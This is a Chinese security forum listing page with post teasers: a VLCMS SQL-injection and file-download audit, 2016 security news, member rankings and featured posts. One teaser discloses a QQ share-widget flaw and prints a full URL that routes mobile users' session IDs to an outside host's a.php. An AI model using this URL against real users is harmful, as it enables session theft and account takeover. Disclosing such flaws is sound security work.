代码审计:vlcms Sql注入漏洞&任意文件下载

喜欢代码审计,但是技术还是很菜,要走的路还很长,求工作,求基友,求交流!程序VLCMS,thinkphp框架的.漏洞文件:/Application/Media/Controller/DownController.class.phpclass DownController extends Controller {public function down_file($game_id=0,$type=1){$model = M('Game','tab_');$map = $game_id;//$map = $type;$data = $model ->field('tab_game_source.*,game_name,tab_game.game_address') ->join("lef ...

苹果遭遇"零日漏洞"威胁 黑客可远程控制iPhone

DoNews8月27日消息(记者 王金宝)据美国“守望者”智能手机安全公司称,iOS操作系统存在3个安全漏洞,均属于“零日漏洞”,黑客可利用该漏洞远程控制他人的iPhone并对特定iPhone用户发动持续攻击。苹果公司迅速对此回应,并于昨日凌晨想用户推送了iOS9.3.5操作系统,同时建议iPhone用户立刻将操作系统更新至最新版本。“守 ...

2016-08-28 00:02:50 7 140

8000余家互联网金融网站一半异常 黑客攻击下不能说的秘密

8月26日,据国家互联网金融风险分析技术平台监测数据显示:截至2016年8月20日,平台共收录互联网金融网站8463家,发现存在异常的互联网金融网站4064家,其中,广东省最多,有1527家,紧接着北京有1211家,上海有980家。另外发现互联网金融仿冒网站34493个。▌互联网金融漏洞严重数据显示,最近一周互联网金融活跃用户4.2亿 ...

2016-08-27 01:43:44 5 184

聚焦新一代勒索软件和思科最新威胁发现

【IT168 评论】如今,全数字化系统已经全面融入企业的方方面面。脆弱而不安全的基础设施无法支持新兴的下一代全数字化经济。为了帮助企业更好地把握全数字化机遇,让安全无处不在,思科不仅提供了符合当前实际需求的智能网络安全解决方案和业界最全面的高级威胁防范解决方案组合,更是借助从海量设备和传感器、公共和私人来 ...

2016-08-26 23:43:08 3 113

教育系统成黑客攻击目标 考生个人信息被打包出售

8月21日,18岁的徐玉玉离开了人世。  徐玉玉是今年的高考生,已经被南京邮电大学录取。8月19日,她接到了一个电话,最终将全家人省吃俭用攒下来的9900元学费全部汇给对方。在确认自己受骗选择报警后,在回家路上,她呼吸骤停,抢救无效后死亡。  徐玉玉的死激起了轩然大波,人们在同情这个姑娘的同时,再一次点燃 ...

2016-08-26 09:38:43 21 441

斯诺登再曝新料:证实美黑客攻击中国公司 哪家中企中招了?

【斯诺登再曝新料】美国“截击”网站19日证实,根据“棱镜”监听项目曝光者、美国前防务承包商雇员爱德华·斯诺登提供的最新文件,美国国家安全局网络“武器库”近日遭黑客组织侵入,业已泄露的文件显示,美国网络攻击目标中包括中国公司。  “截击”网站由率先曝光斯诺登事件的前英国《卫报》记者格伦·格林沃尔德创建,旨在 ...

2016-08-21 17:24:44 8 648

特斯拉自动驾驶可被“黑客”控制

本报讯(记者 温婧)以“协同联动,共建安全命运共同体”为主题的第四届中国互联网安全大会(ISC 2016)日前在北京召开,超过3万名安全行业人士就世界网络安全等问题进行探讨。在本届ISC2016上,素有“黑客嘉年华”之称的HackPwn安全极客狂欢节同步举办,国内外多位知名“黑客”大咖与国内数百位安全极客齐聚,上演了特斯 ...

2016-08-19 18:24:55 2 202

热门活动

T00ls专家

zcgonvh

注册会员

文章15篇,精华8篇

1

Twi1ight

核心会员

文章32篇,精华8篇

2

yours

新手上路

文章19篇,精华2篇

3

宝宝

注册会员

文章50篇,精华2篇

4

Mir4cl3

注册会员

文章36篇,精华2篇

5

4ido10n

注册会员

文章9篇,精华2篇

6

lostwolf

荣誉会员

文章113篇,精华2篇

7

alibaba

荣誉会员

文章21篇,精华2篇

8

my5t3ry

元老核心

文章25篇,精华2篇

9

ninty

元老核心

文章49篇,精华2篇

10

最新精华

渗透测试VBS操作二进制数据,以及一些杂七杂八

drops和谐前看到lcx牛发表的《昨日黄花--vbscript》,里面提到了 ...

2016-07-24 01:57:36 17 360

渗透测试内网渗透大杂烩

闲来无事,就想着写一篇内网渗透大杂烩的文章,之前用莲花仙子账 ...

2016-07-15 21:18:19 59 834

渗透测试CTF中那些脑洞大开的编码和加密

0x00 前言正文开始之前先闲扯几句吧,玩CTF的小伙伴也许会遇到类 ...

2016-07-14 23:14:53 19 1233

Web安全Discuz X2.0-X3.2(20160601) 后台Getshell Exploit 分享

第一句话,其实这个真的很鸡肋。。。一直对discuz X3.2束手无策 ...

2016-07-03 00:00:09 33 696

腾讯(qq.com)内容分享钓鱼漏洞,可导致SID泄露

当用户访问如下链接时,[url]http://connect.qq.com/widget/shareqq/index.html?url=http://host5681544d.kryptcloud.com/a.php&desc=&title=&summary=&pics=http://host5681544d.kryptcloud.com/a.php&flash=&sit&style=201&width=32&height=32[/url]会创建一个网页缩略图。当手机用户访问该缩略图时,会自动附上自己的SIDa.php可以通过$_SERVER['HTTP_REFERER'] 获取到访问来路,从而导致用户的SID泄露